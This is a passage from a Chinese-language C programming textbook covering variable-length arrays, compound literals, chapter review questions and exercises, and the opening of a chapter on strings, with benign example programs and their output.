可以用sum2d()函数分别计算这些数组的元素之和: 713 tot = sum2d(array1, 5);  // 5×4 数组的元素之和 tot = sum2d(array2, 100); // 100×4数组的元素之和 tot = sum2d(array3, 2);  // 2×4数组的元素之和 sum2d()函数之所以能处理这些数组,是因为这些数组的列数固定为4, 而行数被传递给形参rows, rows是一个变量。但是如果要计算6×5的数组 (即6行5列),就不能使用这个函数,必须重新创建一个CLOS为5的函数。 因为C规定,数组的维数必须是常量,不能用变量来代替COLS。 要创建一个能处理任意大小二维数组的函数,比较繁琐(必须把数组作 为一维数组传递,然后让函数计算每行的开始处)。而且,这种方法不好处 理FORTRAN的子例程,这些子例程都允许在函数调用中指定两个维度。虽 然 FORTRAN 是比较老的编程语言,但是在过去的几十年里,数值计算领域 的专家已经用FORTRAN开发出许多有用的计算库。C正逐渐替代 FORTRAN,如果能直接转换现有的FORTRAN库就好了。 鉴于此,C99新增了变长数组(variable-length array,VLA),允许使用 变量表示数组的维度。如下所示: int quarters = 4; int regions = 5; double sales[regions][quarters];  // 一个变长数组(VLA) 前面提到过,变长数组有一些限制。变长数组必须是自动存储类别,这 意味着无论在函数中声明还是作为函数形参声明,都不能使用static或extern 存储类别说明符(第12章介绍)。而且,不能在声明中初始化它们。最终, C11把变长数组作为一个可选特性,而不是必须强制实现的特性。 注意 变长数组不能改变大小 变长数组中的“变”不是指可以修改已创建数组的大小。一旦创建了变长 714 数组,它的大小则保持不变。这里的“变”指的是:在创建数组时,可以使用 变量指定数组的维度。 由于变长数组是C语言的新特性,目前完全支持这一特性的编译器不 多。下面我们来看一个简单的例子:如何编写一个函数,计算int的二维数组 所有元素之和。 首先,要声明一个带二维变长数组参数的函数,如下所示: int sum2d(int rows, int cols, int ar[rows][cols]); // ar是一个变长数组 (VLA) 注意前两个形参(rows和cols)用作第3个形参二维数组ar的两个维度。 因为ar的声明要使用rows和cols,所以在形参列表中必须在声明ar之前先声 明这两个形参。因此,下面的原型是错误的: int sum2d(int ar[rows][cols], int rows, int cols); // 无效的顺序 C99/C11标准规定,可以省略原型中的形参名,但是在这种情况下,必 须用星号来代替省略的维度: int sum2d(int, int, int ar[*][*]); // ar是一个变长数组(VLA),省略了维度 形参名 其次,该函数的定义如下: int sum2d(int rows, int cols, int ar[rows][cols]) { int r; int c; int tot = 0; 715 for (r = 0; r < rows; r++) for (c = 0; c < cols; c++) tot += ar[r][c]; return tot; } 该函数除函数头与传统的C函数(程序清单10.17)不同外,还把符号常 量COLS替换成变量cols。这是因为在函数头中使用了变长数组。由于用变 量代表行数和列数,所以新的sum2d()现在可以处理任意大小的二维int数 组,如程序清单10.18所示。但是,该程序要求编译器支持变长数组特性。 另外,该程序还演示了以变长数组作为形参的函数既可处理传统C数组,也 可处理变长数组。 程序清单10.18 vararr2d.c程序 //vararr2d.c -- 使用变长数组的函数 #include <stdio.h> #define ROWS 3 #define COLS 4 int sum2d(int rows, int cols, int ar[rows][cols]); int main(void) { int i, j; int rs = 3; 716 int cs = 10; int junk[ROWS][COLS] = { { 2, 4, 6, 8 }, { 3, 5, 7, 9 }, { 12, 10, 8, 6 } }; int morejunk[ROWS - 1][COLS + 2] = { { 20, 30, 40, 50, 60, 70 }, { 5, 6, 7, 8, 9, 10 } }; int varr[rs][cs]; // 变长数组(VLA) for (i = 0; i < rs; i++) for (j = 0; j < cs; j++) varr[i][j] = i * j + j; printf("3x5 array\n"); printf("Sum of all elements = %d\n", sum2d(ROWS, COLS,  junk)); printf("2x6 array\n"); printf("Sum of all elements = %d\n", sum2d(ROWS - 1,  COLS + 2, morejunk)); 717 printf("3x10 VLA\n"); printf("Sum of all elements = %d\n", sum2d(rs, cs, varr)); return 0; } // 带变长数组形参的函数 int sum2d(int rows, int cols, int ar[rows][cols]) { int r; int c; int tot = 0; for (r = 0; r < rows; r++) for (c = 0; c < cols; c++) tot += ar[r][c]; return tot; } 下面是该程序的输出: 3x5 array Sum of all elements = 80 2x6 array 718 Sum of all elements = 315 3x10 VLA Sum of all elements = 270 需要注意的是,在函数定义的形参列表中声明的变长数组并未实际创建 数组。和传统的语法类似,变长数组名实际上是一个指针。这说明带变长数 组形参的函数实际上是在原始数组中处理数组,因此可以修改传入的数组。 下面的代码段指出指针和实际数组是何时声明的: int thing[10][6]; twoset(10,6,thing); ... } void twoset (int n, int m, int ar[n][m]) // ar是一个指向数组(内含m个int类 型的值)的指针 { int temp[n][m];  // temp是一个n×m的int数组 temp[0][0] = 2;  // 设置temp的一个元素为2 ar[0][0] = 2;   // 设置thing[0][0]为2 } 如上代码所示调用twoset()时,ar成为指向thing[0]的指针,temp被创建 为10×6的数组。因为ar和thing都是指向thing[0]的指针,ar[0][0]与thing[0][0] 访问的数据位置相同。 719 const和数组大小 是否可以在声明数组时使用const变量? const int SZ = 80; ... double ar[SZ]; // 是否允许? C90标准不允许(也可能允许)。数组的大小必须是给定的整型常量表 达式,可以是整型常量组合,如20、sizeof表达式或其他不是const的内容。 由于C实现可以扩大整型常量表达式的范围,所以可能会允许使用const,但 是这种代码可能无法移植。 C99/C11 标准允许在声明变长数组时使用 const 变量。所以该数组的定 义必须是声明在块中的自动存储类别数组。 变长数组还允许动态内存分配,这说明可以在程序运行时指定数组的大 小。普通 C数组都是静态内存分配,即在编译时确定数组的大小。由于数组 大小是常量,所以编译器在编译时就知道了。第12章将详细介绍动态内存分 配。 720 10.9 复合字面量 假设给带int类型形参的函数传递一个值,要传递int类型的变量,但是也 可以传递int类型常量,如5。在C99 标准以前,对于带数组形参的函数,情 况不同,可以传递数组,但是没有等价的数组常量。C99新增了复合字面量 (compound literal)。字面量是除符号常量外的常量。例如,5是int类型字 面量, 81.3是double类型的字面量,'Y'是char类型的字面量,"elephant"是字 符串字面量。发布C99标准的委员会认为,如果有代表数组和结构内容的复 合字面量,在编程时会更方便。 对于数组,复合字面量类似数组初始化列表,前面是用括号括起来的类 型名。例如,下面是一个普通的数组声明: int diva[2] = {10, 20}; 下面的复合字面量创建了一个和diva数组相同的匿名数组,也有两个int 类型的值: (int [2]){10, 20}   // 复合字面量 注意,去掉声明中的数组名,留下的int [2]即是复合字面量的类型名。 初始化有数组名的数组时可以省略数组大小,复合字面量也可以省略大 小,编译器会自动计算数组当前的元素个数: (int []){50, 20, 90} // 内含3个元素的复合字面量 因为复合字面量是匿名的,所以不能先创建然后再使用它,必须在创建 的同时使用它。使用指针记录地址就是一种用法。也就是说,可以这样用: int * pt1; pt1 = (int [2]) {10, 20}; 721 注意,该复合字面量的字面常量与上面创建的 diva 数组的字面常量完 全相同。与有数组名的数组类似,复合字面量的类型名也代表首元素的地 址,所以可以把它赋给指向int的指针。然后便可使用这个指针。例如,本例 中*pt1是10,pt1[1]是20。 还可以把复合字面量作为实际参数传递给带有匹配形式参数的函数: int sum(const int ar[], int n); ... int total3; total3 = sum((int []){4,4,4,5,5,5}, 6); 这里,第1个实参是内含6个int类型值的数组,和数组名类似,这同时也 是该数组首元素的地址。这种用法的好处是,把信息传入函数前不必先创建 数组,这是复合字面量的典型用法。 可以把这种用法应用于二维数组或多维数组。例如,下面的代码演示了 如何创建二维int数组并储存其地址: int (*pt2)[4];   // 声明一个指向二维数组的指针,该数组内含2个数组 元素, // 每个元素是内含4个int类型值的数组 pt2 = (int [2][4]) { {1,2,3,-9}, {4,5,6,-8} }; 如上所示,该复合字面量的类型是int [2][4],即一个2×4的int数组。 程序清单10.19把上述例子放进一个完整的程序中。 程序清单10.19 flc.c程序 // flc.c -- 有趣的常量 722 #include <stdio.h> #define COLS 4 int sum2d(const int ar[][COLS], int rows); int sum(const int ar[], int n); int main(void) { int total1, total2, total3; int * pt1; int(*pt2)[COLS]; pt1 = (int[2]) { 10, 20 }; pt2 = (int[2][COLS]) { {1, 2, 3, -9}, { 4, 5,  6, -8 } }; total1 = sum(pt1, 2); total2 = sum2d(pt2, 2); total3 = sum((int []){ 4, 4, 4, 5, 5, 5 }, 6); printf("total1 = %d\n", total1); printf("total2 = %d\n", total2); printf("total3 = %d\n", total3); return 0; 723 } int sum(const int ar [], int n) { int i; int total = 0; for (i = 0; i < n; i++) total += ar[i]; return total; } int sum2d(const int ar [][COLS], int rows) { int r; int c; int tot = 0; for (r = 0; r < rows; r++) for (c = 0; c < COLS; c++) tot += ar[r][c]; return tot; } 724 要支持C99的编译器才能正常运行该程序示例(目前并不是所有的编译 器都支持),其输出如下: total1 = 30 total2 = 4 total3 = 27 记住,复合字面量是提供只临时需要的值的一种手段。复合字面量具有 块作用域(第12章将介绍相关内容),这意味着一旦离开定义复合字面量的 块,程序将无法保证该字面量是否存在。也就是说,复合字面量的定义在最 内层的花括号中。 725 10.10 关键概念 数组用于储存相同类型的数据。C 把数组看作是派生类型,因为数组是 建立在其他类型的基础上。也就是说,无法简单地声明一个数组。在声明数 组时必须说明其元素的类型,如int类型的数组、float类型的数组,或其他类 型的数组。所谓的其他类型也可以是数组类型,这种情况下,创建的是数组 的数组(或称为二维数组)。 通常编写一个函数来处理数组,这样在特定的函数中解决特定的问题, 有助于实现程序的模块化。在把数组名作为实际参数时,传递给函数的不是 整个数组,而是数组的地址(因此,函数对应的形式参数是指针)。为了处 理数组,函数必须知道从何处开始读取数据和要处理多少个数组元素。数组 地址提供了“地址”,“元素个数”可以内置在函数中或作为单独的参数传递。 第 2 种方法更普遍,因为这样做可以让同一个函数处理不同大小的数组。 数组和指针的关系密切,同一个操作可以用数组表示法或指针表示法。 它们之间的关系允许你在处理数组的函数中使用数组表示法,即使函数的形 式参数是一个指针,而不是数组。 对于传统的 C 数组,必须用常量表达式指明数组的大小,所以数组大 小在编译时就已确定。C99/C11新增了变长数组,可以用变量表示数组大 小。这意味着变长数组的大小延迟到程序运行时才确定。 726 10.11 本章小结 数组是一组数据类型相同的元素。数组元素按顺序储存在内存中,通过 整数下标(或索引)可以访问各元素。在C中,数组首元素的下标是0,所 以对于内含n个元素的数组,其最后一个元素的下标是n-1。作为程序员,要 确保使用有效的数组下标,因为编译器和运行的程序都不会检查下标的有效 性。 声明一个简单的一维数组形式如下: type name [ size ]; 这里,type是数组中每个元素的数据类型,name是数组名,size是数组 元素的个数。对于传统的C数组,要求size是整型常量表达式。但是C99/C11 允许使用整型非常量表达式。这种情况下的数组被称为变长数组。 C把数组名解释为该数组首元素的地址。换言之,数组名与指向该数组 首元素的指针等价。概括地说,数组和指针的关系十分密切。如果ar是一个 数组,那么表达式ar[i]和*(ar+i)等价。 对于 C 语言而言,不能把整个数组作为参数传递给函数,但是可以传 递数组的地址。然后函数可以使用传入的地址操控原始数组。如果函数没有 修改原始数组的意图,应在声明函数的形式参数时使用关键字const。在被 调函数中可以使用数组表示法或指针表示法,无论用哪种表示法,实际上使 用的都是指针变量。 指针加上一个整数或递增指针,指针的值以所指向对象的大小为单位改 变。也就是说,如果pd指向一个数组的8字节double类型值,那么pd加1意味 着其值加8,以便它指向该数组的下一个元素。 二维数组即是数组的数组。例如,下面声明了一个二维数组: double sales[5][12]; 727 该数组名为sales,有5个元素(一维数组),每个元素都是一个内含12 个double类型值的数组。第1个一维数组是sales[0],第2个一维数组是 sales[1],以此类推,每个元素都是内含12个double类型值的数组。使用第2 个下标可以访问这些一维数组中的特定元素。例如,sales[2][5]是slaes[2]的 第6个元素,而sales[2]是sales的第3个元素。 C 语言传递多维数组的传统方法是把数组名(即数组的地址)传递给类 型匹配的指针形参。声明这样的指针形参要指定所有的数组维度,除了第1 个维度。传递的第1个维度通常作为第2个参数。例如,为了处理前面声明的 sales数组,函数原型和函数调用如下: void display(double ar[][12], int rows); ... display(sales, 5); 变长数组提供第2种语法,把数组维度作为参数传递。在这种情况下, 对应函数原型和函数调用如下: void display(int rows, int cols, double ar[rows][cols]); ... display(5, 12, sales); 虽然上述讨论中使用的是int类型的数组和double类型的数组,其他类型 的数组也是如此。然而,字符串有一些特殊的规则,这是由于其末尾的空字 符所致。有了这个空字符,不用传递数组的大小,函数通过检测字符串的末 尾也知道在何处停止。我们将在第11章中详细介绍。 728 10.12 复习题 复习题的参考答案在附录A中。 1.下面的程序将打印什么内容? #include <stdio.h> int main(void) { int ref[] = { 8, 4, 0, 2 }; int *ptr; int index; for (index = 0, ptr = ref; index < 4; index++, ptr++) printf("%d %d\n", ref[index], *ptr); return 0; } 2.在复习题1中,ref有多少个元素? 3.在复习题1中,ref的地址是什么?ref + 1是什么意思?++ref指向什 么? 4.在下面的代码中,*ptr和*(ptr + 2)的值分别是什么? a. int *ptr; 729 int torf[2][2] = {12, 14, 16}; ptr = torf[0]; b. int * ptr; int fort[2][2] = { {12}, {14,16} }; ptr = fort[0]; 5.在下面的代码中,**ptr和**(ptr + 1)的值分别是什么? a. int (*ptr)[2]; int torf[2][2] = {12, 14, 16}; ptr = torf; b. int (*ptr)[2]; int fort[2][2] = { {12}, {14,16} }; ptr = fort; 6.假设有下面的声明: int grid[30][100]; a.用1种写法表示grid[22][56] b.用2种写法表示grid[22][0] 730 c.用3种写法表示grid[0][0] 7.正确声明以下各变量: a.digits是一个内含10个int类型值的数组 b.rates是一个内含6个float类型值的数组 c.mat是一个内含3个元素的数组,每个元素都是内含5个整数的数组 d.psa是一个内含20个元素的数组,每个元素都是指向int的指针 e.pstr是一个指向数组的指针,该数组内含20个char类型的值 8. a.声明一个内含6个int类型值的数组,并初始化各元素为1、2、4、8、 16、32 b.用数组表示法表示a声明的数组的第3个元素(其值为4) c.假设编译器支持C99/C11标准,声明一个内含100个int类型值的数组, 并初始化最后一个元素为-1,其他元素不考虑 d.假设编译器支持C99/C11标准,声明一个内含100个int类型值的数组, 并初始化下标为5、10、11、12、3的元素为101,其他元素不考虑 9.内含10个元素的数组下标范围是什么? 10.假设有下面的声明: float rootbeer[10], things[10][5], *pf, value = 2.2; int i = 3; 判断以下各项是否有效: 731 a.rootbeer[2] = value; b.scanf("%f", &rootbeer ); c.rootbeer = value; d.printf("%f", rootbeer); e.things[4][4] = rootbeer[3]; f.things[5] = rootbeer; g.pf = value; h.pf = rootbeer; 11.声明一个800×600的int类型数组。 12.下面声明了3个数组: double trots[20]; short clops[10][30]; long shots[5][10][15]; a.分别以传统方式和以变长数组为参数的方式编写处理trots数组的void 函数原型和函数调用 b.分别以传统方式和以变长数组为参数的方式编写处理clops数组的void 函数原型和函数调用 c.分别以传统方式和以变长数组为参数的方式编写处理shots数组的void 函数原型和函数调用 13.下面有两个函数原型: 732 void show(const double ar[], int n);     // n是数组元素的个数 void show2(const double ar2[][3], int n);  // n是二维数组的行数 a.编写一个函数调用,把一个内含8、3、9和2的复合字面量传递给 show()函数。 b.编写一个函数调用,把一个2行3列的复合字面量(8、3、9作为第1 行,5、4、1作为第2行)传递给show2()函数。 733 10.13 编程练习 1.修改程序清单10.7的rain.c程序,用指针进行计算(仍然要声明并初始 化数组)。 2.编写一个程序,初始化一个double类型的数组,然后把该数组的内容 拷贝至3个其他数组中(在main()中声明这4个数组)。使用带数组表示法的 函数进行第1份拷贝。使用带指针表示法和指针递增的函数进行第2份拷贝。 把目标数组名、源数组名和待拷贝的元素个数作为前两个函数的参数。第3 个函数以目标数组名、源数组名和指向源数组最后一个元素后面的元素的指 针。也就是说,给定以下声明,则函数调用如下所示: double source[5] = {1.1, 2.2, 3.3, 4.4, 5.5}; double target1[5]; double target2[5]; double target3[5]; copy_arr(target1, source, 5); copy_ptr(target2, source, 5); copy_ptrs(target3, source, source + 5); 3.编写一个函数,返回储存在int类型数组中的最大值,并在一个简单的 程序中测试该函数。 4.编写一个函数,返回储存在double类型数组中最大值的下标,并在一 个简单的程序中测试该函数。 5.编写一个函数,返回储存在double类型数组中最大值和最小值的差 值,并在一个简单的程序中测试该函数。 734 6.编写一个函数,把double类型数组中的数据倒序排列,并在一个简单 的程序中测试该函数。 7.编写一个程序,初始化一个double类型的二维数组,使用编程练习2中 的一个拷贝函数把该数组中的数据拷贝至另一个二维数组中(因为二维数组 是数组的数组,所以可以使用处理一维数组的拷贝函数来处理数组中的每个 子数组)。 8.使用编程练习2中的拷贝函数,把一个内含7个元素的数组中第3~第5 个元素拷贝至内含3个元素的数组中。该函数本身不需要修改,只需要选择 合适的实际参数(实际参数不需要是数组名和数组大小,只需要是数组元素 的地址和待处理元素的个数)。 9.编写一个程序,初始化一个double类型的3×5二维数组,使用一个处理 变长数组的函数将其拷贝至另一个二维数组中。还要编写一个以变长数组为 形参的函数以显示两个数组的内容。这两个函数应该能处理任意N×M数组 (如果编译器不支持变长数组,就使用传统C函数处理N×5的数组)。 10.编写一个函数,把两个数组中相对应的元素相加,然后把结果储存 到第 3 个数组中。也就是说,如果数组1中包含的值是2、4、5、8,数组2中 包含的值是1、0、4、6,那么该函数把3、4、9、14赋给第3个数组。函数接 受3个数组名和一个数组大小。在一个简单的程序中测试该函数。 11.编写一个程序,声明一个int类型的3×5二维数组,并用合适的值初始 化它。该程序打印数组中的值,然后各值翻倍(即是原值的2倍),并显示 出各元素的新值。编写一个函数显示数组的内容,再编写一个函数把各元素 的值翻倍。这两个函数都以函数名和行数作为参数。 12.重写程序清单10.7的rain.c程序,把main()中的主要任务都改成用函数 来完成。 13.编写一个程序,提示用户输入3组数,每组数包含5个double类型的数 (假设用户都正确地响应,不会输入非数值数据)。该程序应完成下列任 735 务。 a.把用户输入的数据储存在3×5的数组中 b.计算每组(5个)数据的平均值 c.计算所有数据的平均值 d.找出这15个数据中的最大值 e.打印结果 每个任务都要用单独的函数来完成(使用传统C处理数组的方式)。完 成任务b,要编写一个计算并返回一维数组平均值的函数,利用循环调用该 函数3次。对于处理其他任务的函数,应该把整个数组作为参数,完成任务c 和d的函数应把结果返回主调函数。 14.以变长数组作为函数形参,完成编程练习13。 [1].在最后一次while循环中执行完start++;后,start的值就是end的值。——译 者注 736 第11章 字符串和字符串函数 本章介绍以下内容: 函数:gets()、gets_s()、fgets()、puts()、fputs()、strcat()、strncat()、 strcmp()、strncmp()、strcpy()、strncpy()、sprintf()、strchr() 创建并使用字符串 使用C库中的字符和字符串函数,并创建自定义的字符串函数 使用命令行参数 字符串是C语言中最有用、最重要的数据类型之一。虽然我们一直在使 用字符串,但是要学的东西还很多。C 库提供大量的函数用于读写字符串、 拷贝字符串、比较字符串、合并字符串、查找字符串等。通过本章的学习, 读者将进一步提高自己的编程水平。 737 11.1 表示字符串和字符串I/O 第4章介绍过,字符串是以空字符(\0)结尾的char类型数组。因此,可 以把上一章学到的数组和指针的知识应用于字符串。不过,由于字符串十分 常用,所以 C提供了许多专门用于处理字符串的函数。本章将讨论字符串的 性质、如何声明并初始化字符串、如何在程序中输入和输出字符串,以及如 何操控字符串。 程序清单11.1演示了在程序中表示字符串的几种方式。 程序清单11.1 strings1.c程序 //  strings1.c #include <stdio.h> #define MSG "I am a symbolic string constant." #define MAXLENGTH 81 int main(void) { char words[MAXLENGTH] = "I am a string in an array."; const char * pt1 = "Something is pointing at me."; puts("Here are some strings:"); puts(MSG); puts(words); puts(pt1); 738 words[8] = 'p'; puts(words); return 0; } 和printf()函数一样,puts()函数也属于stdio.h系列的输入/输出函数。但 是,与printf()不同的是,puts()函数只显示字符串,而且自动在显示的字符 串末尾加上换行符。下面是该程序的输出: Here are some strings: I am an old-fashioned symbolic string constant. I am a string in an array. Something is pointing at me. I am a spring in an array. 我们先分析一下该程序中定义字符串的几种方法,然后再讲解把字符串 读入程序涉及的一些操作,最后学习如何输出字符串。 11.1.1 在程序中定义字符串 程序清单11.1中使用了多种方法(即字符串常量、char类型数组、指向 char的指针)定义字符串。程序应该确保有足够的空间储存字符串,这一点 我们稍后讨论。 1.字符串字面量(字符串常量) 用双引号括起来的内容称为字符串字面量(string literal),也叫作字符 串常量(string constant)。双引号中的字符和编译器自动加入末尾的\0字 符,都作为字符串储存在内存中,所以"I am a symbolic stringconstant."、"I 739 am a string in an array."、"Something is pointed at me."、"Here are some strings:"都是字符串字面量。 从ANSI C标准起,如果字符串字面量之间没有间隔,或者用空白字符 分隔,C会将其视为串联起来的字符串字面量。例如: char greeting[50] = "Hello, and"" how are" " you" " today!"; 与下面的代码等价: char greeting[50] = "Hello, and how are you today!"; 如果要在字符串内部使用双引号,必须在双引号前面加上一个反斜杠 (\): printf("\"Run, Spot, run!\" exclaimed Dick.\n"); 输出如下: "Run, Spot, run!" exclaimed Dick. 字符串常量属于静态存储类别(static storage class),这说明如果在函 数中使用字符串常量,该字符串只会被储存一次,在整个程序的生命期内存 在,即使函数被调用多次。用双引号括起来的内容被视为指向该字符串储存 位置的指针。这类似于把数组名作为指向该数组位置的指针。如果确实如 此,程序清单11.2中的程序会输出什么? 程序清单11.2 strptr.c程序 /* strptr.c -- 把字符串看作指针 */ #include <stdio.h> int main(void) 740 { printf("%s, %p, %c\n", "We", "are", *"space farers"); return 0; } printf()根据%s 转换说明打印 We,根据%p 转换说明打印一个地址。因 此,如果"are"代表一个地址,printf()将打印该字符串首字符的地址(如果使 用ANSI之前的实现,可能要用%u或%lu代替%p)。最后,*"space farers"表 示该字符串所指向地址上储存的值,应该是字符串*"space farers"的首字 符。是否真的是这样?下面是该程序的输出: We, 0x100000f61, s 2.字符串数组和初始化 定义字符串数组时,必须让编译器知道需要多少空间。一种方法是用足 够空间的数组储存字符串。在下面的声明中,用指定的字符串初始化数组 m1: const char m1[40] = "Limit yourself to one line's worth."; const表明不会更改这个字符串。 这种形式的初始化比标准的数组初始化形式简单得多: const char m1[40] = { 'L','i', 'm', 'i', 't', ' ', 'y', 'o', 'u', 'r', 's', 'e', 'l', 'f', ' ', 't', 'o', ' ', 'o', 'n', 'e', ' ','l', 'i', 'n', 'e', '\", 's', ' ', 'w', 'o', 'r','t', 'h', '.', '\0' }; 741 注意最后的空字符。没有这个空字符,这就不是一个字符串,而是一个 字符数组。 在指定数组大小时,要确保数组的元素个数至少比字符串长度多1(为 了容纳空字符)。所有未被使用的元素都被自动初始化为0(这里的0指的是 char形式的空字符,不是数字字符0),如图11.1所示。 图11.1 初始化数组 通常,让编译器确定数组的大小很方便。回忆一下,省略数组初始化声 明中的大小,编译器会自动计算数组的大小: const char m2[] = "If you can't think of anything, fake it."; 让编译器确定初始化字符数组的大小很合理。因为处理字符串的函数通 常都不知道数组的大小,这些函数通过查找字符串末尾的空字符确定字符串 在何处结束。 让编译器计算数组的大小只能用在初始化数组时。如果创建一个稍后再 填充的数组,就必须在声明时指定大小。声明数组时,数组大小必须是可求 值的整数。在C99新增变长数组之前,数组的大小必须是整型常量,包括由 整型常量组成的表达式。 int n = 8; char cookies[1];    // 有效 char cakes[2 + 5];// 有效,数组大小是整型常量表达式 742 char pies[2*sizeof(long double) + 1]; // 有效 char crumbs[n];     // 在C99标准之前无效,C99标准之后这种数组 是变长数组 字符数组名和其他数组名一样,是该数组首元素的地址。因此,假设有 下面的初始化: char car[10] = "Tata"; 那么,以下表达式都为真: car == &car[0]、*car == 'T'、*(car+1) == car[1] == 'a'。 还可以使用指针表示法创建字符串。例如,程序清单11.1中使用了下面 的声明: const char * pt1 = "Something is pointing at me."; 该声明和下面的声明几乎相同: const char ar1[] = "Something is pointing at me."; 以上两个声明表明,pt1和ar1都是该字符串的地址。在这两种情况下, 带双引号的字符串本身决定了预留给字符串的存储空间。尽管如此,这两种 形式并不完全相同。 3.数组和指针 数组形式和指针形式有何不同?以上面的声明为例,数组形式(ar1[]) 在计算机的内存中分配为一个内含29个元素的数组(每个元素对应一个字 符,还加上一个末尾的空字符'\0'),每个元素被初始化为字符串字面量对 应的字符。通常,字符串都作为可执行文件的一部分储存在数据段中。当把 程序载入内存时,也载入了程序中的字符串。字符串储存在静态存储区 (static memory)中。但是,程序在开始运行时才会为该数组分配内存。此 743 时,才将字符串拷贝到数组中(第 12 章将详细讲解)。注意,此时字符串 有两个副本。一个是在静态内存中的字符串字面量,另一个是储存在ar1数 组中的字符串。 此后,编译器便把数组名ar1识别为该数组首元素地址(&ar1[0])的别 名。这里关键要理解,在数组形式中,ar1是地址常量。不能更改ar1,如果 改变了ar1,则意味着改变了数组的存储位置(即地址)。可以进行类似 ar1+1这样的操作,标识数组的下一个元素。但是不允许进行++ar1这样的操 作。递增运算符只能用于变量名前(或概括地说,只能用于可修改的左 值),不能用于常量。 指针形式(*pt1)也使得编译器为字符串在静态存储区预留29个元素的 空间。另外,一旦开始执行程序,它会为指针变量pt1留出一个储存位置, 并把字符串的地址储存在指针变量中。该变量最初指向该字符串的首字符, 但是它的值可以改变。因此,可以使用递增运算符。例如,++pt1将指向第 2 个字符(o)。 字符串字面量被视为const数据。由于pt1指向这个const数据,所以应该 把pt1声明为指向const数据的指针。这意味着不能用pt1改变它所指向的数 据,但是仍然可以改变pt1的值(即,pt1指向的位置)。如果把一个字符串 字面量拷贝给一个数组,就可以随意改变数据,除非把数组声明为const。 总之,初始化数组把静态存储区的字符串拷贝到数组中,而初始化指针 只把字符串的地址拷贝给指针。程序清单11.3演示了这一点。 程序清单11.3 addresses.c程序 // addresses.c -- 字符串的地址 #define MSG "I'm special" #include <stdio.h> int main() 744 { char ar[] = MSG; const char *pt = MSG; printf("address of \"I'm special\": %p \n", "I'm special"); printf("         address ar: %p\n", ar); printf("         address pt: %p\n", pt); printf("       address of MSG: %p\n", MSG); printf("address of \"I'm special\": %p \n", "I'm special"); return 0; } 下面是在我们的系统中运行该程序后的输出: address of "I'm special": 0x100000f10 address ar: 0x7fff5fbff858 address pt: 0x100000f10 address of MSG: 0x100000f10 address of "I'm special": 0x100000f10 该程序的输出说明了什么?第一,pt和MSG的地址相同,而ar的地址不 同,这与我们前面讨论的内容一致。第二,虽然字符串字面量"I'm special"在程序的两个 printf()函数中出现了两次,但是编译器只使用了一个 存储位置,而且与MSG的地址相同。编译器可以把多次使用的相同字面量 745 储存在一处或多处。另一个编译器可能在不同的位置储存3个"I'm special"。 第三,静态数据使用的内存与ar使用的动态内存不同。不仅值不同,特定编 译器甚至使用不同的位数表示两种内存。 数组和指针表示字符串的区别是否很重要?通常不太重要,但是这取决 于想用程序做什么。我们来进一步讨论这个主题。 4.数组和指针的区别 初始化字符数组来储存字符串和初始化指针来指向字符串有何区别 (“指向字符串”的意思是指向字符串的首字符)?例如,假设有下面两个声 明: char heart[] = "I love Tillie!"; const char *head = "I love Millie!"; 两者主要的区别是:数组名heart是常量,而指针名head是变量。那么, 实际使用有什么区别? 首先,两者都可以使用数组表示法: for (i = 0; i < 6; i++) putchar(heart[i]); putchar('\n'); for (i = 0; i < 6; i++) putchar(head[i]); putchar('\n'); 上面两段代码的输出是: 746 I love I love 其次,两者都能进行指针加法操作: for (i = 0; i < 6; i++) putchar(*(heart + i)); putchar('\n'); for (i = 0; i < 6; i++) putchar(*(head + i)); putchar('\n'); 输出如下: I love I love 但是,只有指针表示法可以进行递增操作: while (*(head) != '\0')  /* 在字符串末尾处停止*/ putchar(*(head++));  /* 打印字符,指针指向下一个位置 */ 这段代码的输出如下: I love Millie! 假设想让head和heart统一,可以这样做: head = heart;   /* head现在指向数组heart */ 747 这使得head指针指向heart数组的首元素。 但是,不能这样做: heart = head;   /* 非法构造,不能这样写 */ 这类似于x = 3;和3 = x;的情况。赋值运算符的左侧必须是变量(或概括 地说是可修改的左值),如*pt_int。顺带一提,head = heart;不会导致head指 向的字符串消失,这样做只是改变了储存在head中的地址。除非已经保存 了"I love Millie!"的地址,否则当head指向别处时,就无法再访问该字符串。 另外,还可以改变heart数组中元素的信息: heart[7]= 'M';或者*(heart + 7) = 'M'; 数组的元素是变量(除非数组被声明为const),但是数组名不是变 量。 我们来看一下未使用const限定符的指针初始化: char * word = "frame"; 是否能使用该指针修改这个字符串? word[1] = 'l'; // 是否允许? 编译器可能允许这样做,但是对当前的C标准而言,这样的行为是未定 义的。例如,这样的语句可能导致内存访问错误。原因前面提到过,编译器 可以使用内存中的一个副本来表示所有完全相同的字符串字面量。例如,下 面的语句都引用字符串"Klingon"的一个内存位置: char * p1 = "Klingon"; p1[0] = 'F'; // ok? printf("Klingon"); 748 printf(": Beware the %ss!\n", "Klingon"); 也就是说,编译器可以用相同的地址替换每个"Klingon"实例。如果编译 器使用这种单次副本表示法,并允许p1[0]修改'F',那将影响所有使用该字 符串的代码。所以以上语句打印字符串字面量"Klingon"时实际上显示的 是"Flingon": Flingon: Beware the Flingons! 实际上在过去,一些编译器由于这方面的原因,其行为难以捉摸,而另 一些编译器则导致程序异常中断。因此,建议在把指针初始化为字符串字面 量时使用const限定符: const char * pl = "Klingon";  // 推荐用法 然而,把非const数组初始化为字符串字面量却不会导致类似的问题。 因为数组获得的是原始字符串的副本。 总之,如果不修改字符串,不要用指针指向字符串字面量。 5.字符串数组 如果创建一个字符数组会很方便,可以通过数组下标访问多个不同的字 符串。程序清单11.4演示了两种方法:指向字符串的指针数组和char类型数 组的数组。 程序清单11.4 arrchar.c程序 // arrchar.c -- 指针数组,字符串数组 #include <stdio.h> #define SLEN 40 #define LIM 5 749 int main(void) { const char *mytalents[LIM] = { "Adding numbers swiftly", "Multiplying accurately", "Stashing data", "Following instructions to the letter", "Understanding the C language" }; char yourtalents[LIM][SLEN] = { "Walking in a straight line", "Sleeping", "Watching television", "Mailing letters", "Reading email" }; int i; puts("Let's compare talents."); printf("%-36s  %-25s\n", "My Talents", "Your Talents"); for (i = 0; i < LIM; i++) printf("%-36s  %-25s\n", mytalents[i], yourtalents[i]); printf("\nsizeof mytalents: %zd, sizeof yourtalents: %zd\n", 750 sizeof(mytalents), sizeof(yourtalents)); return 0; } 下面是该程序的输出: Let's compare talents. My Talents                        Your Talents Adding numbers swiftly              Walking in  a straight line Multiplying accurately              Sleeping Stashing data                      Watching television Following instructions to the letter   Mailing letters Understanding the C language          Reading email sizeof mytalents: 40, sizeof yourtalents: 200 从某些方面来看,mytalents和yourtalents非常相似。两者都代表5个字符 